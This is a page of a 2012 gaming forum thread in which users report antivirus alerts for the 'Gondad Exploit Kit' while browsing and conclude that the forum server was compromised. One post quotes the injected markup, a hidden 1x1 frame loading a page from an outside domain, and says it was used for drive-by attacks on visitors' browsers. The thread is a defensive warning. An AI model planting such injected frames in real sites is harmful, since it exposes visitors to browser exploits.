Latest Diablo 3 News
DiabloWiki Updates
Page 1 of 5 12345 LastLast
Results 1 to 10 of 46
  1. #1
    IncGamers Member
    Join Date
    Nov 2009
    Posts
    1,575

    AVG is identifying a threat from viewing this forum

    Remember that forums.weddingbells.ca junk that was appended to every post recently? Now I'm getting notices that AVG is blocking "Exploit Gondad Exploit Kit (type 1935)" with file name "forums.weddingbells.ca/tmp/index.html" every time I view anything on the forums here.

    It was suspicious when I saw the forums.weddingbells.ca stuff appended to every post, and now this is even worse... what's going on?



  2. #2
    IncGamers Member
    Join Date
    Aug 2011
    Posts
    46

    Re: AVG is identifying a threat from viewing this forum

    I'm also getting this. I was on this page: http://diablo.incgamers.com/forums/s...uestions/page4 and AVG popped up and with a "Threat Blocked!" warning.

    File: forums.weddingbells.ca/tmp/index.html
    Infection: Exploit Gondad Exploit Kit (type 1935)
    Result: Object was blocked

    It could be one of the ads on the site? Figured you guys should know...it's a bit alarming.



  3. #3
    IncGamers Member
    Join Date
    Aug 2011
    Posts
    46

    Re: AVG is identifying a threat from viewing this forum

    Oh I see what you mean about forums.weddinbells appended to every post. There's a hidden ****** at the end of every thread title that links to that site. This should probably be fixed immediately...



  4. #4
    Banned
    Join Date
    May 2012
    Posts
    12

    This server is compromised and attempts to exploit visitors' browsers

    Clearly, an intruder installer malicious software on the server running this forum.

    You can easily see it by the "<****** src=http://forums.weddingbells.ca/tmp/index.html width=1 height=1></******>" being included in the HTML source multiple times, with antivirus software detecting this as "Gondad Exploit Kit".

    That malware apparently attempts to exploit multiple vulnerabilities in Flash, Java and others to take over the visitors' browsers.

    Please fix this ASAP and take security seriously.



  5. #5
    IncGamers Member
    Join Date
    Aug 2011
    Posts
    46

    Re: AVG is identifying a threat from viewing this forum

    I can't seem to figure out what the exploit actually does, but here's an AVG analytics of it: http://www.avgthreatlabs.com/webthre...kit/#analytics



  6. #6
    IncGamers Member Tryzx's Avatar
    Join Date
    Apr 2011
    Location
    Quebec
    Posts
    318

    Re: AVG is identifying a threat from viewing this forum

    Quote Originally Posted by nZifnab View Post
    Oh I see what you mean about forums.weddinbells appended to every post. There's a hidden ****** at the end of every thread title that links to that site. This should probably be fixed immediately...
    I see a white square at the end of every title. Is that what you are talking about?



  7. #7
    IncGamers Member
    Join Date
    Jul 2003
    Location
    Sweden
    Posts
    135

    Re: This server is compromised and attempts to exploit visitors' browsers

    Getting the same warning when entering the forums.




  8. #8
    IncGamers Member Mn_Swe2's Avatar
    Join Date
    Jun 2003
    Location
    Sweden
    Posts
    1,203

    Re: AVG is identifying a threat from viewing this forum



    This is constantly alerted browsing these forums!




  9. #9
    IncGamers Member Sokar Rostau's Avatar
    Join Date
    May 2004
    Location
    Australia
    Posts
    3,146

    Re: AVG is identifying a threat from viewing this forum

    According to AVG, tribalfusion.com is one of the top sources for this threat.

    Look at what your browser is loading next time you move around on this forum if you don't know what I'm talking about.



    Last edited by Sokar Rostau; 05-05-2012 at 22:21.

  10. #10
    IncGamers Member TheShaft's Avatar
    Join Date
    Aug 2011
    Posts
    72

    Re: This server is compromised and attempts to exploit visitors' browsers

    NoScript FTW!



Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •